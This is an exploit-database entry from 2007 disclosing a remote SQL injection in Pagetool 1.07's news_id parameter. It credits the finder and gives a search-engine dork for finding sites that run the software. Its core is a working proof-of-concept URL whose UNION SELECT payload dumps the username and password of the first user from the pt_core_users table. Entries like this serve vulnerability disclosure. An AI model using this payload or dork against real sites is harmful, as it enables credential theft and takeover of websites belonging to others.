id: 1977
date: 06/24/2007
title: Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability
author: Katatafish
cves: 

==========================================================
Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability
==========================================================


###pagetool-1.07 Remote SQL Injection###
#
#download:http://kent.dl.sourceforge.net/sourceforge/pagetool/pagetool-1.07.tar.gz
#
#Found by: Katatafish 
#
#Dork: "powered by Pagetool"
#
########################################

#PoC
http://www.site.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1



#  0day.today [2023-03-23]  #